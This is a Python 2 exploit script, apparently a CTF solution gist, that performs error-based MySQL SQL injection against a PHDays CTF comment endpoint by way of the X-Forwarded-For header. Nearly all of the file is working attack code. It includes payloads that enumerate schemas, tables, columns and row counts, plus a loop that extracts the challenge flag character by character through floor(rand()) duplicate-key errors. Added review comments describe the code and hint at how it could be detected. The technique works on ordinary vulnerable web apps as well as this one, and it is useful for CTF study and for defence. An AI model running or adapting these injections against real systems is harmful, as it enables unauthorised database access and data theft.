@0x90
Last active December 10, 2015 00:08
#!/bin/env python
import httplib,urllib
from urlparse import urlparse
from time import sleep
# The only endpoint this script talks to; inject_query() and get_flag() split
# it with urlparse() and use just the netloc and path.
TARGET_URL = 'http://ctf.phdays.com:1411/news/1/add-comment'
def inject_query(query):
    """Send *query* to TARGET_URL inside the X-Forwarded-For header and return
    the response fragment the callers parse.

    Args:
        query: SQL boolean expression; it is spliced verbatim into the header
            template "1'and %s and '1'='1".

    Returns:
        The whole body when the server answers 302; otherwise the text between
        the first '<strong>' and the following '</div>'. The callers then look
        for '~' delimiters inside that fragment.

    Raises:
        IndexError: when a non-302 body contains no '<strong>' marker.
        Network errors raised by httplib are not caught.
    """
    sleep(1)  # fixed 1 s pause before every request (get_flag() does not pause)
    parsed = urlparse(TARGET_URL)
    conn = httplib.HTTPConnection(parsed.netloc)
    # NOTE(review): the injected expression rides in a proxy header rather than
    # the URL or body, so detection has to inspect header values, not just paths.
    headers = {"X-Forwarded-For": "1'and %s and '1'='1" % query}
    conn.request('GET', '%s' % parsed.path, headers=headers)
    resp = conn.getresponse()
    print "STATUS: %s" % resp.status
    html = resp.read()
    if resp.status == 302:
        return html
    else:
        return html.split('<strong>')[1].split('</div>')[0]
def get_mysql_version():
    """Return inject_query()'s raw fragment for a version() probe.

    The ':' split that would isolate the version text is commented out, so the
    caller receives the unparsed fragment (or raises IndexError from
    inject_query itself).
    """
    query ="row(1,1)>(select count(*),concat(version(),0x3a,floor(rand()*2)) x from (select 1 union select 2)a group by x limit 1)"
    return inject_query(query)#.split(":")[1]
def get_current_database():
    """Return database() as reported by the target, decoded to a str.

    The fragment from inject_query() is expected to hold the value as hex
    between two '~' markers; the quotes are stripped and the hex is decoded
    with the Python 2 str.decode('hex').

    Raises:
        IndexError: if the fragment has no '~' marker.
    """
    query ="(select 1 from(select count(*),concat((select (select concat(0x7e,0x27,Hex(cast(database() as char)),0x27,0x7e)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)"
    return inject_query(query).split('~')[1].replace("'","").decode('hex')
def current_user():
    """Return user() as reported by the target, decoded to a str.

    Same parsing as get_current_database(): hex between '~' markers, quotes
    stripped, then str.decode('hex') (Python 2 only).

    Raises:
        IndexError: if the fragment has no '~' marker.
    """
    query ="(select 1 from(select count(*),concat((select (select concat(0x7e,0x27,Hex(cast(user() as char)),0x27,0x7e)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)"
    return inject_query(query).split('~')[1].replace("'","").decode('hex')
def get_databases():
    """Return a tuple of schema names, one request per name, read from
    information_schema.schemata.

    The LIMIT offset starts at 1 here, whereas get_tables() and
    get_column_names() start at 0. The loop stops at the first empty fragment
    returned by inject_query().

    Raises:
        IndexError: if a non-empty fragment lacks the '~' markers.
    """
    i = 1
    databases = ()
    while True:
        query = "(select 1 from(select count(*),concat((select (select (SELECT distinct concat(0x7e,0x27,Hex(cast(schema_name as char)),0x27,0x7e) FROM information_schema.schemata LIMIT %i,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)" % i
        res = inject_query(query)
        if res == '':
            break
        else:
            # value is hex between the '~' markers; decode with Python 2 str.decode
            databases += (res.split('~')[1].replace("'","").decode('hex'),)
        i+=1
    return databases
def get_tables(db):
    """Return a tuple of table names in schema *db*, one request per name.

    Args:
        db: schema name; hex-encoded with the Python 2 str.encode('hex') before
            it is placed in the query as a 0x... literal.

    Returns:
        Tuple of str; empty when the very first fragment is ''.

    Raises:
        IndexError: if a non-empty fragment lacks the '~' markers.
    """
    i = 0
    dbname_hex = db.encode('hex')
    tables = ()
    while True:
        query = "(select 1 from(select count(*),concat((select (select (SELECT distinct concat(0x7e,0x27,Hex(cast(table_name as char)),0x27,0x7e) FROM information_schema.tables Where table_schema=0x%s limit %i,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)" % (dbname_hex,i)
        res = inject_query(query)
        if res == '':
            break
        else:
            tables += (res.split('~')[1].replace("'","").decode('hex'),)
        i+=1
    return tables
def get_column_names(db,table):
    """Return a tuple of column names of *db*.*table*, one request per name.

    Args:
        db: schema name, hex-encoded (Python 2 str.encode('hex')) into the query.
        table: table name, hex-encoded the same way.

    Returns:
        Tuple of str; empty when the first fragment is ''.

    Raises:
        IndexError: if a non-empty fragment lacks the '~' markers.
    """
    i = 0
    columns = ()
    while True:
        query = "(select 1 from(select count(*),concat((select (select (" \
            "SELECT distinct concat(0x7e,0x27,Hex(cast(column_name as char)),0x27,0x7e) " \
            "FROM information_schema.columns Where table_schema=0x%s AND table_name=0x%s limit %i,1)) " \
            "from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)" % (db.encode('hex'),table.encode('hex'),i)
        res = inject_query(query)
        if res == '':
            break
        else:
            columns += (res.split('~')[1].replace("'","").decode('hex'),)
        i+=1
    return columns
def get_records_count(db,table):
    """Return the row count of `db`.table as a string (not hex-decoded).

    Args:
        db: schema name, interpolated inside backticks.
        table: table name, interpolated raw with no quoting or hex encoding
            (unlike get_tables()/get_column_names()).

    Raises:
        IndexError: if the fragment lacks the '~' markers.
    """
    query = "(select 1 from(select count(*),concat((select (select " \
        "(SELECT concat(0x7e,0x27,count(*),0x27,0x7e) FROM `%s`.%s))"\
        "from information_schema.tables limit 0,1),floor(rand(0)*2))x " \
        "from information_schema.tables group by x)a)" % (db,table)
    return inject_query(query).split('~')[1].replace("'","")
def fetch_record(db,table,column,row):
    """Return inject_query()'s raw fragment for row *row* of *table*.*column*
    in schema *db*.

    The '~' parsing is commented out, so the caller receives the unparsed
    fragment. *db* goes inside backticks; *table* and *column* are interpolated
    raw; *row* is the LIMIT offset.
    """
    query = "(select 1 from(select count(*),concat((select (select " \
        "(SELECT concat(0x7e,0x27,Hex(cast(%s.%s as char)),0x27,0x7e) " \
        "FROM `%s`.%s LIMIT %i,1) ) from information_schema.tables limit 0,1)," \
        "floor(rand(0)*2))x from information_schema.tables group by x)a)" % (table,column,db,table,row)
    return inject_query(query) #.split('~')[1].replace("'","")
def get_flag():
    """Read up to 64 characters of web.flags.flag, one request per character.

    Unlike inject_query(), this issues its own requests on a single shared
    HTTPConnection with no delay (the sleep is commented out). A 500 response
    is the hit signal: its body is expected to carry ascii(char) between '~'
    markers, which is converted with chr() and appended. Any other status is
    printed and that position is skipped, so the result may be shorter than 64.

    Returns:
        str of the recovered characters, in offset order 0..63.

    Raises:
        IndexError / ValueError: if a 500 body does not carry an integer
        between '~' markers.
    """
    result = ""
    parsed = urlparse(TARGET_URL)
    conn = httplib.HTTPConnection(parsed.netloc)
    for i in xrange(0,64):
        # NOTE(review): 64 back-to-back requests that differ only in the
        # substring offset inside the header value -- that repetition is what a
        # header-inspection or rate rule on the server side would key on.
        headers = {"X-Forwarded-For": "'and (select 1 from(select count(*),concat((concat(char(126),(select ascii(substring(flag,%i,1)) from web.flags limit 0,1),char(126))),floor(rand(0)*2))x from information_schema.tables group by x)a) and '" % (i,)}
        conn.request('GET', '%s' % parsed.path, headers=headers)
        resp = conn.getresponse()
        html = resp.read()
        #sleep(1)
        if resp.status == 500:
            # the value comes back inside the server's error response
            num = int(html.split('~')[1])
            result += chr(num)
            print "%i => %i : %x: %c"%(i, num, num, chr(num))
        else:
            print "STATUS: %s" % resp.status
    return result
def dump_all():
    """Print every db.table found, its column names and its row count.

    The commented-out first line refers to mysql_version() and
    current_database(), which are not defined in this file (the helpers are
    named get_mysql_version and get_current_database), so it would raise
    NameError if re-enabled as written.
    """
    #print "Version: %s Database: %s User: %s" % (mysql_version(),current_database(),current_user())
    databases = get_databases()
    for db in databases:
        for table in get_tables(db):
            print "%s.%s" % (db,table)
            columns = get_column_names(db,table)
            print columns
            print get_records_count(db,table)
if __name__ == "__main__":
    # Entry point: only get_flag() runs; dump_all() and fetch_record() are
    # unreferenced or commented out below.
    #94bd6136818878b5dd97d3a231a97649
    nums = get_flag()
    print nums
    #for num in nums:
    #print num.enc
    #fetch_record('web','flags','flag',1)